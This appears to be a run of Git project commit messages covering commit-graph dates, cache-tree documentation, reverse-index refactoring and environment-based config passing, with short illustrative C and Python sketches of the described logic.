Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both fill_commit_graph_info() and fill_commit_in_graph() parse
information present in commit data chunk. Let's simplify the
implementation by calling fill_commit_graph_info() within
fill_commit_in_graph().
fill_commit_graph_info() used to not load committer date from commit data
chunk. However, with the upcoming switch to using corrected committer
date as generation number v2, we will have to load committer date to
compute generation number value anyway.
e51217e15 (t5000: test tar files that overflow ustar headers,
2016-06-30) introduced a test 'generate tar with future mtime' that
creates a commit with committer date of (2^36 + 1) seconds since
EPOCH. The CDAT chunk provides 34-bits for storing committer date, thus
committer time overflows into generation number (within CDAT chunk) and
has undefined behavior.
The test used to pass as fill_commit_graph_info() would not set struct
member `date` of struct commit and load committer date from the object
database, generating a tar file with the expected mtime.
However, with corrected commit date, we will load the committer date
from CDAT chunk (truncated to lower 34-bits) to populate the generation
number. Thus, Git sets date and generates tar file with the truncated
mtime.
The ustar format (the header format used by most modern tar programs)
only has room for 11 (or 12, depending on some implementations) octal
digits for the size and mtime of each file.
As the CDAT chunk is overflowed by 12-octal digits but not 11-octal
digits, we split the existing tests to test both implementations
separately and add a new explicit test for 11-digit implementation.
To test the 11-octal digit implementation, we create a future commit
with committer date of 2^34 - 1, which overflows 11-octal digits without
overflowing 34-bits of the Commit Data chunk.
To test the 12-octal digit implementation, the smallest committer date
possible is 2^36 + 1, which overflows the CDAT chunk and thus
commit-graph must be disabled for the test.
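The arithmetic behind the two test dates can be checked with a few
helpers. The function names are hypothetical; the only facts used are
that one octal digit holds 3 bits and that CDAT has 34 bits for the
committer date.

```c
#include <stdint.h>

/* Does `value` fit in `digits` octal digits (3 bits per digit)? */
static int fits_octal_digits(uint64_t value, unsigned digits)
{
	return value < (UINT64_C(1) << (3 * digits));
}

/* Does `value` fit in the 34 bits CDAT provides for the committer date? */
static int fits_cdat_date(uint64_t value)
{
	return value < (UINT64_C(1) << 34);
}

/* What remains of a date when only its low 34 bits are kept. */
static uint64_t truncate_to_cdat(uint64_t value)
{
	return value & ((UINT64_C(1) << 34) - 1);
}
```

2^34 - 1 needs more than 11 octal digits (33 bits) yet still fits in
CDAT, while 2^36 + 1 fits in neither 12 octal digits nor CDAT and would
be truncated to 1.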
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In indegree_walk_step(), we add unvisited parents to the indegree queue.
However, parents are not guaranteed to be parsed. As the indegree queue
sorts by generation number, let's parse parents before inserting them to
ensure the correct priority order.
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Before computing Bloom filters, the commit-graph machinery uses
commit_gen_cmp to sort commits by generation order for improved diff
performance. 3d11275505 (commit-graph: examine commits by generation
number, 2020-03-30) claims that this sort can reduce the time spent to
compute Bloom filters by nearly half.
But since c49c82aa4c (commit: move members graph_pos, generation to a
slab, 2020-06-17), this optimization is broken, since asking for a
'commit_graph_generation()' directly returns GENERATION_NUMBER_INFINITY
while writing.
Not all hope is lost, though: 'commit_gen_cmp()' falls back to
comparing commits by their date when they have equal generation number,
and so, since c49c82aa4c, it has been purely a date comparison function.
This heuristic is good enough that we don't seem to lose appreciable
performance while computing Bloom filters.
Applying this patch (compared with v2.30.0) speeds up computing Bloom
filters by factors ranging from 0.40% to 5.19% on various repositories [1].
So, avoid the useless 'commit_graph_generation()' while writing by
instead accessing the slab directly. This returns the newly-computed
generation numbers, and allows us to avoid the heuristic by directly
comparing generation numbers.
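The comparison order described in this message (generation first, date
as a tie-breaker) can be sketched with a qsort() comparator. struct
toy_commit_info and toy_gen_cmp() are hypothetical and operate on plain
values instead of Git's commit objects and slabs.

```c
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical per-commit data used only for sorting. */
struct toy_commit_info {
	uint64_t generation;
	uint64_t date;
};

/* Lower generation first; fall back to date when generations are equal. */
static int toy_gen_cmp(const void *va, const void *vb)
{
	const struct toy_commit_info *a = va, *b = vb;

	if (a->generation != b->generation)
		return a->generation < b->generation ? -1 : 1;
	if (a->date != b->date)
		return a->date < b->date ? -1 : 1;
	return 0;
}
```

If every entry carries the same "infinite" generation, as happened while
writing, the sort degenerates into a pure date sort; with real generation
numbers the date is consulted only on ties.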
[1]: https://lore.kernel.org/git/20210105094535.GN8396@szeder.dev/
Signed-off-by: Abhishek Kumar <abhishekkumar8222@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous change reduced time spent in strlen() while comparing
consecutive paths in verify_cache(), but we can do better. The
conditional checks the existence of a directory separator at the correct
location, but only after doing a string comparison. Swap the order to be
logically equivalent but perform fewer string comparisons.
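The reordering can be sketched like this. is_inside_dir() is a
hypothetical helper, not the code in verify_cache(); it only shows the
cheap single-byte test running before the string comparison.

```c
#include <string.h>

/*
 * Does `next` name a path inside directory `dir`, that is, does it start
 * with `dir` followed by a '/'? Lengths are passed in so that no strlen()
 * is needed.
 */
static int is_inside_dir(const char *dir, size_t dir_len,
			 const char *next, size_t next_len)
{
	return dir_len < next_len &&
	       next[dir_len] == '/' &&        /* cheap check first */
	       !strncmp(dir, next, dir_len);  /* compare only if needed */
}
```

Because && short-circuits, most consecutive paths are rejected by the
one-byte test, and strncmp() runs only for the few candidates that have a
separator in the right place.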
To test the effect on performance, I used a repository with over three
million paths in the index. I then ran the following command on repeat:
git -c index.threads=1 commit --amend --allow-empty --no-edit
Here are the measurements over 10 runs after a 5-run warmup:
Benchmark #1: v2.30.0
Time (mean ± σ): 854.5 ms ± 18.2 ms
Range (min … max): 825.0 ms … 892.8 ms
Benchmark #2: Previous change
Time (mean ± σ): 833.2 ms ± 10.3 ms
Range (min … max): 815.8 ms … 849.7 ms
Benchmark #3: This change
Time (mean ± σ): 815.5 ms ± 18.1 ms
Range (min … max): 795.4 ms … 849.5 ms
This change is 2% faster than the previous change and 5% faster than
v2.30.0.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use the name length field of cache entries instead of calculating its
value anew.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The end of the cache tree index extension format trails off with
ellipses ever since 23fcc98 (doc: technical details about the index
file format, 2011-03-01). While an intuitive reader could gather what
this means, it could be better to use "and so on" instead.
Really, this is only justified because I also wanted to point out that
the number of subtrees in the index format is used to determine when the
recursive depth-first-search stack should be "popped." This should help
to add clarity to the format.
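As a rough sketch of that "pop" rule, the walk below reads a flattened,
depth-first list of entries and returns from each level once the
announced number of subtrees has been consumed. struct flat_entry and
walk_entries() are hypothetical and keep only the name and subtree count,
not the full on-disk entry.

```c
#include <stddef.h>

/* Hypothetical flattened entry: only the fields needed for the walk. */
struct flat_entry {
	const char *name;
	int nr_subtrees;
};

/*
 * Consume the entry at *pos and, recursively, all of its subtrees.
 * Returns the deepest level reached; *pos ends just past this subtree.
 */
static int walk_entries(const struct flat_entry *entries, size_t *pos,
			int depth)
{
	const struct flat_entry *e = &entries[(*pos)++];
	int max_depth = depth;
	int i;

	for (i = 0; i < e->nr_subtrees; i++) {
		int d = walk_entries(entries, pos, depth + 1);
		if (d > max_depth)
			max_depth = d;
	}
	/* Returning is the "pop": all nr_subtrees children were read. */
	return max_depth;
}
```

For the list ("", 2), ("a", 1), ("b", 0), ("c", 0), the entry "b" is read
as a child of "a", and "c" is read as the second child of the root.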
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
I had difficulty in my efforts to learn about the cache tree extension
based on the documentation and code because I had an incorrect
assumption about how it behaved. This might be due to some ambiguity in
the documentation, so this change modifies the beginning of the cache
tree format by expanding the description of the feature.
My hope is that this documentation clarifies a few things:
1. There is an in-memory recursive tree structure that is constructed
from the extension data. This structure has a few differences, such
as where the name is stored.
2. What does it mean for an entry to be invalid?
3. When exactly are "new" trees created?
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The index has a "cache tree" extension. This corresponds to a
significant API implemented in cache-tree.[ch]. However, there are a few
places that refer to this erroneously as "cached tree". These are rare,
but notably the index-format.txt file itself makes this error.
The only other reference is in t7104-reset-hard.sh.
Reported-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commands such as "git reset --hard" rebuild the in-memory representation
of the cache tree index extension by parsing tree objects starting at a
known root tree. The performance of this operation can vary widely
depending on the width and depth of the repository's working directory
structure. Measure the time in this operation using trace2 regions in
prime_cache_tree().
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we write or read the cache tree index extension, it can be good to
isolate how much of the file I/O time is spent constructing this
in-memory tree from the existing index or writing it out again to the
new index file. Use trace2 regions to indicate that we are spending time
on this operation.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Comments update.
* ab/gettext-charset-comment-fix:
gettext.c: remove/reword a mostly-useless comment
Makefile: remove a warning about old GETTEXT_POISON flag
Fix 2.29 regression where "git mergetool --tool-help" fails to list
all the available tools.
* pb/mergetool-tool-help-fix:
mergetool--lib: fix '--tool-help' to correctly show available tools
"git for-each-repo --config=<var> <cmd>" should not run <cmd> for
any repository when the configuration variable <var> is not defined
even once.
* ds/for-each-repo-noopfix:
for-each-repo: do nothing on empty config
Some tests expect that "ls -l" output has either '-' or 'x' for
group executable bit, but setgid bit can be inherited from parent
directory and make these fields 'S' or 's' instead, causing test
failures.
* mt/t4129-with-setgid-dir:
t4129: don't fail if setgid is set in the test directory
Follow-up on the "maintenance part-3" which introduced scheduled
maintenance tasks to support platforms whose native scheduling
methods are not 'cron'.
* ds/maintenance-part-4:
maintenance: use Windows scheduled tasks
maintenance: use launchctl on macOS
maintenance: include 'cron' details in docs
maintenance: extract platform-specific scheduling
Bash completion (in contrib/) update to make it easier for
end-users to add completion for their custom "git" subcommands.
* fc/completion-aliases-support:
completion: add proper public __git_complete
test: completion: add tests for __git_complete
completion: bash: improve function detection
completion: bash: add __git_have_func helper
"git stash" did not work well in a sparsely checked out working
tree.
* en/stash-apply-sparse-checkout:
stash: fix stash application in sparse-checkouts
stash: remove unnecessary process forking
t7012: add a testcase demonstrating stash apply bugs in sparse checkouts
Retire more names with "sha1" in it.
* ma/sha1-is-a-hash:
hash-lookup: rename from sha1-lookup
sha1-lookup: rename `sha1_pos()` as `hash_pos()`
object-file.c: rename from sha1-file.c
object-name.c: rename from sha1-name.c
Code clean-up.
* ma/t1300-cleanup:
t1300: don't needlessly work with `core.foo` configs
t1300: remove duplicate test for `--file no-such-file`
t1300: remove duplicate test for `--file ../foo`
"git rev-parse" can be explicitly told to give output as absolute
or relative path with the `--path-format=(absolute|relative)` option.
* bc/rev-parse-path-format:
rev-parse: add option for absolute or relative path formatting
abspath: add a function to resolve paths with missing components
The configuration variable 'core.abbrev' can be set to 'no' to
force no abbreviation regardless of the hash algorithm.
* ew/decline-core-abbrev:
core.abbrev=no disables abbreviations
While we currently have the `GIT_CONFIG_PARAMETERS` environment variable
which can be used to pass runtime configuration data to git processes,
it's an internal implementation detail and not supposed to be used by
end users.
Next to being for internal use only, this way of passing config entries
has a major downside: the config keys need to be parsed as they contain
both key and value in a single variable. As such, it is left to the user
to escape any potentially harmful characters in the value, which is
quite hard to do if values are controlled by a third party.
This commit thus adds a new way of adding config entries via the
environment which gets rid of this shortcoming. If the user passes the
`GIT_CONFIG_COUNT=$n` environment variable, Git will parse environment
variable pairs `GIT_CONFIG_KEY_$i` and `GIT_CONFIG_VALUE_$i` for each
`i` in `[0,n)`.
While the same can be achieved with `git -c <name>=<value>`, one may
wish to not do so for potentially sensitive information. E.g. if one
wants to set `http.extraHeader` to contain an authentication token,
doing so via `-c` would trivially leak those credentials via e.g. ps(1),
which typically also shows command arguments.
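As a rough illustration of the scheme described above, here is a small Python sketch that builds such an environment and reads it back the way this message describes. The helper names `config_env()` and `read_config_env()` are hypothetical, the token is a placeholder, and the reader only models the described behaviour; it is not Git's implementation.

```python
import os


def config_env(pairs, base=None):
    """Return a copy of `base` (default: os.environ) that carries `pairs` as
    GIT_CONFIG_COUNT plus GIT_CONFIG_KEY_<i> / GIT_CONFIG_VALUE_<i>."""
    env = dict(os.environ if base is None else base)
    env["GIT_CONFIG_COUNT"] = str(len(pairs))
    for i, (key, value) in enumerate(pairs):
        env[f"GIT_CONFIG_KEY_{i}"] = key
        env[f"GIT_CONFIG_VALUE_{i}"] = value
    return env


def read_config_env(env):
    """Model of the reading side: one (key, value) pair for each i in [0, n)."""
    count = int(env.get("GIT_CONFIG_COUNT", "0"))
    return [
        (env[f"GIT_CONFIG_KEY_{i}"], env[f"GIT_CONFIG_VALUE_{i}"])
        for i in range(count)
    ]


# Placeholder credential. Key and value travel in separate variables, so
# nothing has to be split on "=" or quoted.
env = config_env([("http.extraHeader", "Authorization: Bearer EXAMPLE")], base={})
print(read_config_env(env))
```

A dictionary built this way could be handed to `subprocess.run(["git", ...], env=...)`, so that the value never appears among the command-line arguments.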
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The `getenv_safe()` helper function helps to safely retrieve multiple
environment values without the need to depend on platform-specific
behaviour for the return value's lifetime. We'll make use of this
function in a following patch, so let's make it available by making it
non-static and adding a declaration.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit added a new format for $GIT_CONFIG_PARAMETERS which
is able to robustly handle subsections with "=" in them. Let's start
writing the new format. Unfortunately, this does much less than you'd
hope, because "git -c" itself has the same ambiguity problem! But it's
still worth doing:
- we've now pushed the problem from the inter-process communication
into the "-c" command-line parser. This would free us up to later
add an unambiguous format there (e.g., separate arguments like "git
--config key value", etc).
- for --config-env, the parser already disallows "=" in the
environment variable name. So:
git --config-env section.with=equals.key=ENVVAR
will robustly set section.with=equals.key to the contents of
$ENVVAR.
The new test shows the improvement for --config-env.
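To see why the --config-env form is unambiguous, consider this minimal Python sketch. It assumes the argument is split at its last "=", which is safe because the variable name cannot contain one. The function name `split_config_env()` and its error handling are hypothetical and only model the idea.

```python
def split_config_env(spec):
    """Split '<key>=<ENVVAR>' at the last '='.

    The environment variable name may not contain '=', so everything
    before the last '=' belongs to the key, equals signs included.
    """
    key, sep, envvar = spec.rpartition("=")
    if not sep or not key or not envvar:
        raise ValueError(f"invalid --config-env argument: {spec!r}")
    return key, envvar


print(split_config_env("section.with=equals.key=ENVVAR"))
```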
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we stuff config options into GIT_CONFIG_PARAMETERS, we shell-quote
each one as a single unit, like:
'section.one=value1' 'section.two=value2'
On the reading side, we de-quote to get the individual strings, and then
parse them by splitting on the first "=" we find. This format is
ambiguous, because an "=" may appear in a subsection. So the config
represented in a file by both:
[section "subsection=with=equals"]
key = value
and:
[section]
subsection = with=equals.key=value
ends up in this flattened format like:
'section.subsection=with=equals.key=value'
and we can't tell which was desired. We have traditionally resolved this
by taking the first "=" we see starting from the left, meaning that we
allowed arbitrary content in the value, but not in the subsection.
Let's make our environment format a bit more robust by separately
quoting the key and value. That turns those examples into:
'section.subsection=with=equals.key'='value'
and:
'section.subsection'='with=equals.key=value'
respectively, and we can tell the difference between them. We can detect
which format is in use for any given element of the list based on the
presence of the unquoted "=". That means we can continue to allow the
old format to work to support any callers which manually used the old
format, and we can even intermingle the two formats. The old format
wasn't documented, and nobody was supposed to be using it. But it's
likely that such callers exist in the wild, so it's nice if we can avoid
breaking them. Likewise, it may be possible to trigger an older version
of "git -c" that runs a script that calls into a newer version of "git
-c"; that new version would see the intermingled format.
This does create one complication, which is that the obvious format in
the new scheme for
[section]
some-bool
is:
'section.some-bool'
with no equals. We'd mistake that for an old-style variable. And it even
has the same meaning in the old style, but:
[section "with=equals"]
some-bool
does not. It would be:
'section.with=equals=some-bool'
which we'd take to mean:
[section]
with = equals=some-bool
in the old, ambiguous style. Likewise, we can't use:
'section.some-bool'=''
because that's ambiguous with an actual empty string. Instead, we'll
again use the shell-quoting to give us a hint, and use:
'section.some-bool'=
to show that we have no value.
Note that this commit just expands the reading side. We'll start writing
the new format via "git -c" in a future patch. In the meantime, the
existing "git -c" tests will make sure we didn't break reading the old
format. But we'll also add some explicit coverage of the two formats to
make sure we continue to handle the old one after we move the writing
side over.
And one final note: since we're now using the shell-quoting as a
semantically meaningful hint, this closes the door to us ever allowing
arbitrary shell quoting, like:
'a'shell'would'be'ok'with'this'.key=value
But we have never supported that (only what sq_quote() would produce),
and we are probably better off keeping things simple, robust, and
backwards-compatible, than trying to make it easier for humans. We'll
continue not to advertise the format of the variable to users, and
instead keep "git -c" as the recommended mechanism for setting config
(even if we are trying to be kind not to break users who may be relying
on the current undocumented format).
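The rules above can be modelled in a few lines of Python. This is only a sketch of the format as described in this message, not the C parser: the function names are hypothetical, keys are not normalized, and only the quoting that sq_quote() would produce is understood.

```python
def sq_dequote_step(s, i):
    """Dequote one single-quoted string starting at s[i]; return (text, next_i)."""
    if i >= len(s) or s[i] != "'":
        raise ValueError("expected a single-quoted string")
    out = []
    i += 1
    while True:
        j = s.find("'", i)
        if j < 0:
            raise ValueError("unterminated quote")
        out.append(s[i:j])
        i = j + 1
        # sq_quote() writes an embedded ' or ! as '\'' or '\!'
        if s.startswith("\\", i) and i + 2 < len(s) and s[i + 1] in "'!" and s[i + 2] == "'":
            out.append(s[i + 1])
            i += 3
            continue
        return "".join(out), i


def parse_config_parameters(s):
    """Return (key, value) pairs; value is None for a valueless boolean."""
    entries = []
    i = 0
    while i < len(s):
        if s[i] == " ":
            i += 1
            continue
        first, i = sq_dequote_step(s, i)
        if i < len(s) and s[i] == "=":
            # New style: an unquoted "=" separates the quoted key and value.
            i += 1
            if i < len(s) and s[i] == "'":
                value, i = sq_dequote_step(s, i)
            else:
                value = None  # 'key'= with nothing after it: no value
            entries.append((first, value))
        else:
            # Old style: one quoted unit, split on the first "=".
            key, sep, value = first.partition("=")
            entries.append((key, value if sep else None))
    return entries


print(parse_config_parameters("'section.subsection=with=equals.key'='value'"))
print(parse_config_parameters("'section.subsection=with=equals.key=value'"))
```

The first call keeps the "=" signs in the key, while the second one, being in the old format, still resolves the ambiguity in favour of the value.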
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the "git blame --porcelain" output, lines that end with three
integers may not be the line that shows a commit object with line
numbers and block length (the contents from the blamed file or the
summary field can have a line that happens to match). Also, the
names of the author may have more than three SP separated tokens
("git blame -L242,+1 cf6de18aab Documentation/SubmittingPatches"
gives an example). The existing "grep -E | cut" pipeline is a bit
too loose on these two points.
While they can be assumed on the test data, it is not so hard to
use the right pattern from the documented format, so let's do so.
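For illustration only, here is how a stricter match might look in Python. The sample output is hand-written rather than produced by "git blame", the object name is a made-up 40-hex string (SHA-1 is assumed), and `authors_by_line()` is a hypothetical helper, not the pattern used in the test.

```python
import re

# Header line: object name, original line, final line, lines in the group.
HEADER = re.compile(r"^([0-9a-f]{40}) (\d+) (\d+) (\d+)$")
# The author name is everything after "author ", however many tokens it has.
AUTHOR = re.compile(r"^author (.*)$")

OID = "0123456789abcdef0123456789abcdef01234567"
sample = (
    f"{OID} 1 1 1\n"
    "author A U Thor Jr III\n"
    "author-mail <author@example.com>\n"
    "summary fix 1 2 3\n"
    "filename file.txt\n"
    "\tcontent line 4 5 6\n"
)


def authors_by_line(porcelain):
    """Return (final_line, author) for each group that carries an author line."""
    result = []
    final_line = None
    for line in porcelain.splitlines():
        m = HEADER.match(line)
        if m:
            final_line = int(m.group(3))
            continue
        m = AUTHOR.match(line)
        if m and final_line is not None:
            result.append((final_line, m.group(1)))
    return result


# A loose "ends with three integers" match also catches the summary and
# the content line; the anchored header pattern does not.
loose = [l for l in sample.splitlines() if re.search(r" \d+ \d+ \d+$", l)]
print(len(loose), authors_by_line(sample))
```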
Signed-off-by: Junio C Hamano <gitster@pobox.com>
gitmailmap(5) uses 'GIT_WORK_DIR' to refer to the root of the
repository, but this environment variable does not exist.
Use the correct spelling for that variable, 'GIT_WORK_TREE'.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We run "git pull" against "$cask_repo"; clarify that we are
expecting not to have any of our own modifications and running "git
pull" to merely update, by passing "--ff-only" on the command line.
Also, the "brew cask install" command line triggers an error message
that says:
Error: Calling brew cask install is disabled! Use brew install
[--cask] instead.
In addition, "brew install caskroom/cask/perforce" step triggers an
error that says:
Error: caskroom/cask was moved. Tap homebrew/cask instead.
Attempt to see if blindly following the suggestion in these error
messages gets us into a better shape.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We may return objects in one of two orders: how they appear in the .idx
(sorted by object id) or how they appear in the packfile itself. To
further complicate matters, we have two ordering variables, "i" and
"pos", and it is not clear to which order they apply.
Let's clarify this by using an unambiguous name where possible, and
leaving a comment for the variable that does double-duty.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a pipe, only the return code of the last command is used. Thus, all
other commands will have their return codes masked. Rewrite pipes so
that there are no git commands upstream so that their failure is
reported.
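The effect is easy to reproduce outside the test suite. The Python sketch below assumes a POSIX "sh" and "cat" are available and uses "(exit 3)" as a stand-in for a failing git command; the file name "out" is arbitrary.

```python
import subprocess
import tempfile


def run(script, cwd):
    """Run `script` with sh in directory `cwd` and return its exit status."""
    return subprocess.run(["sh", "-c", script], cwd=cwd).returncode


with tempfile.TemporaryDirectory() as tmp:
    # Upstream of a pipe: the failure is masked by the status of "cat".
    piped = run("(exit 3) | cat", tmp)
    # Written to a file first: the failure stops the "&&" chain.
    split = run("(exit 3) >out && cat out", tmp)

print(piped, split)
```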
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Acked-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The usage comment for test_commit() shows that the --author option
should be given as `--author=<author>`. However, this is incorrect as it
only works when given as `--author <author>`. Correct this erroneous
text.
Also, for the sake of correctness, fix the description as well since we
invoke `git commit` with `--author <author>`, not `--author=<author>`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Acked-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
write_promisor_file() already uses xfopen(), so it would die
if the file cannot be opened for writing. To be consistent
with this behavior and not overlook issues, let's also die if
there are errors when we are actually writing to the file.
Suggested-by: Jeff King <peff@peff.net>
Suggested-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* en/ort-conflict-handling:
merge-ort: add handling for different types of files at same path
merge-ort: copy find_first_merges() implementation from merge-recursive.c
merge-ort: implement format_commit()
merge-ort: copy and adapt merge_submodule() from merge-recursive.c
merge-ort: copy and adapt merge_3way() from merge-recursive.c
merge-ort: flesh out implementation of handle_content_merge()
merge-ort: handle book-keeping around two- and three-way content merge
merge-ort: implement unique_path() helper
merge-ort: handle directory/file conflicts that remain
merge-ort: handle D/F conflict where directory disappears due to merge
* en/diffcore-rename:
diffcore-rename: remove unnecessary duplicate entry checks
diffcore-rename: accelerate rename_dst setup
diffcore-rename: simplify and accelerate register_rename_src()
t4058: explore duplicate tree entry handling in a bit more detail
t4058: add more tests and documentation for duplicate tree entry handling
diffcore-rename: reduce jumpiness in progress counters
diffcore-rename: simplify limit check
diffcore-rename: avoid usage of global in too_many_rename_candidates()
diffcore-rename: rename num_create to num_destinations
To prepare for on-disk reverse indexes, remove a spot in
'offset_to_pack_pos()' that looks at the 'revindex' array in 'struct
packed_git'.
Even though this use of the revindex pointer is within pack-revindex.c,
this clean-up is still worth doing. Since the 'revindex' pointer will be
NULL when reading from an on-disk reverse index (instead the
'revindex_data' pointer will be mmaped to the 'pack-*.rev' file), this
call-site would have to include a conditional to look up the offset for
position 'mi' on each iteration through the search.
So instead of open-coding 'pack_pos_to_offset()', call it directly from
within 'offset_to_pack_pos()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that all spots outside of pack-revindex.c that reference 'struct
revindex_entry' directly have been removed, it is safe to hide the
implementation by moving it from pack-revindex.h to pack-revindex.c.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that all 'find_revindex_position()' callers have been removed (and
converted to the more descriptive 'offset_to_pack_pos()'), it is almost
safe to get rid of 'find_revindex_position()' entirely. Almost, except
for the fact that 'offset_to_pack_pos()' calls
'find_revindex_position()'.
Inline 'find_revindex_position()' into 'offset_to_pack_pos()', and
then remove 'find_revindex_position()' entirely.
This is a straightforward refactoring with one minor snag.
'offset_to_pack_pos()' used to load the index before calling
'find_revindex_position()'. That means that by the time
'find_revindex_position()' starts executing, 'p->num_objects' can be
safely read. After inlining, be careful to not read 'p->num_objects'
until _after_ 'load_pack_revindex()' (which loads the index as a
side-effect) has been called.
Another small fix that is included is converting the upper and
lower bounds from int to unsigned. This dates back to
92e5c77c37 (revindex: export new APIs, 2013-10-24)--ironically, the last
time we introduced new APIs here--but this unifies the types.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that no callers of 'find_pack_revindex()' remain, remove the
function's declaration and implementation entirely.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'estimate_repack_memory()' takes into account the amount of memory
required to load the reverse index in memory by multiplying the assumed
number of objects by the size of the 'revindex_entry' struct.
Prepare for hiding the definition of 'struct revindex_entry' by removing
a 'sizeof()' of that type from outside of pack-revindex.c. Instead,
guess that one off_t and one uint32_t are required per object. Strictly
speaking, this is a worse guess than asking for 'sizeof(struct
revindex_entry)' directly, since the true size of this struct is 16
bytes with padding on the end of the struct in order to align the offset
field.
But, this is an approximation anyway, and it does remove a use of the
'struct revindex_entry' from outside of pack-revindex internals.
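The difference between the two guesses can be checked with a quick Python sketch. It assumes a 64-bit off_t and uses a ctypes stand-in for the struct (an offset followed by a 32-bit position); the class below is an illustration, not the definition from pack-revindex.

```python
import ctypes


class RevindexEntry(ctypes.Structure):
    # Stand-in layout: a 64-bit offset followed by a 32-bit position.
    _fields_ = [("offset", ctypes.c_int64), ("nr", ctypes.c_uint32)]


# The new estimate: one off_t plus one uint32_t per object.
per_object_guess = ctypes.sizeof(ctypes.c_int64) + ctypes.sizeof(ctypes.c_uint32)
# What sizeof() reports, including any padding the platform adds.
struct_size = ctypes.sizeof(RevindexEntry)

print(per_object_guess, struct_size)
```

Where 64-bit integers are 8-byte aligned, the second number comes out larger than the first because of the trailing padding.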
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Avoid looking at the 'revindex' pointer directly and instead call
'pack_pos_to_index()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove direct manipulation of the 'struct revindex_entry' type as well
as calls to the deprecated API in 'packfile.c:unpack_entry()'. Usual
clean-up is performed (replacing '->nr' with calls to
'pack_pos_to_index()' and so on).
Add an additional check to make sure that 'obj_offset()' points at a
valid object. In the case this check is violated, we cannot call
'mark_bad_packed_object()' because we don't know the OID. At the top of
the call stack is do_oid_object_info_extended() (via
packed_object_info()), which does mark the object.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert another call of 'find_pack_revindex()' to its replacement
'pack_pos_to_offset()'. Likewise:
- Avoid manipulating `struct packed_git`'s `revindex` pointer directly
by removing the pointer-as-array indexing.
- Add an additional guard to check that the offset 'obj_offset()'
points to a real object. This should be the case with well-behaved
callers to 'packed_object_info()', but isn't guaranteed.
Other blocks that fill in various other values from the 'struct
object_info' request handle bad inputs by setting the type to
'OBJ_BAD' and jumping to 'out'. Do the same when given a bad offset
here.
The previous code would have segfaulted when given a bad
'obj_offset' value, since 'find_pack_revindex()' would return
'NULL', and then the line that fills 'oi->disk_sizep' would try to
access 'NULL[1]' with a stride of 16 bytes (the width of 'struct
revindex_entry').
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Perform exactly the same conversion as in the previous commit to another
caller within 'packfile.c'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace direct accesses to the 'struct revindex' type with a call to
'pack_pos_to_index()'.
Likewise drop the old-style 'find_pack_revindex()' with its replacement
'offset_to_pack_pos()' (while continuing to perform the same error
checking).
Signed-off-by: Taylor Blau <me@ttaylorr.com>
